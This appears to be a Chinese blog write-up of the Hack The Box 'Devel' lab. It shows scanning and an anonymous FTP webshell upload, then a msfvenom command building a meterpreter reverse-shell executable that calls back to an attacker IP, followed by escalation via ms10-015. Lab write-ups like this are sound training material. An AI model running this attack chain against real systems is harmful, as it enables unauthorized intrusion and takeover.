Hack The Box —— Devel

发布于 2024-10-11 12:02:20 字数 2812 浏览 3 评论 0

信息搜集

nmap

nmap -T4 -A -v 10.10.10.5

发现服务器开了 21 端口和 80 端口,同时 ftp 服务可以匿名访问,但是不知道版本号。浏览器访问 http 服务,发现 只有 iis 的默认页面。

目录扫描

利用 dirsearch 工具扫描一波目录:

python3 dirsearch -u http://10.10.10.5 -e html

并未有什么特殊的发现。

FTP

匿名访问 FTP 服务,发现当前目录下有写权限,所以,想通过上传 webshell 的方式获取服务器的权限。

漏洞利用

webshell

首先上传 aspx 的 webshell:

浏览器访问,发现 webshell 未报错,可以执行。

用蚁剑链接:

访问一些目录,发现权限不足。

利用蚁剑的 虚拟终端 ,执行 whoami ,发现只有 iis user 的权限,遂想办法提权。

权限提升

利用 msfvenom 生成 exe 木马文件,使用 msf 接收到回连的 shell,方便提权。

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.10 LPORT=4444 -f exe > shell.exe

然后将生成的 shell.exe 文件通过蚁剑上传到目标服务器上,并通过虚拟终端执行。

使用 msf 监听端口,接收回连的 shell :

使用 msf 自带的检测脚本,查看可能用于提权的漏洞:

经过一个一个的测试:发现 ms10-015 可以用来提权。

成功创建了一个新的 session.

在 meterpreter 下执行 getuid 命令:

发现成功提权。

接下来就可以 type c:\users\Administrator\Desktop\root.txt.txt 获取 flag 了。

如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。

扫码二维码加入Web技术交流群

发布评论

需要 登录 才能够评论, 你可以免费 注册 一个本站的账号。
列表为空,暂无数据

关于作者

つ可否回来

暂无简介

0 文章
0 评论
23 人气
更多

推荐作者

忆伤

文章 0 评论 0

眼泪也成诗

文章 0 评论 0

zangqw

文章 0 评论 0

旧伤慢歌

文章 0 评论 0

qq_GlP2oV

文章 0 评论 0

旧时模样

文章 0 评论 0

    我们使用 Cookies 和其他技术来定制您的体验包括您的登录状态等。通过阅读我们的 隐私政策 了解更多相关信息。 单击 接受 或继续使用网站,即表示您同意使用 Cookies 和您的相关数据。
    原文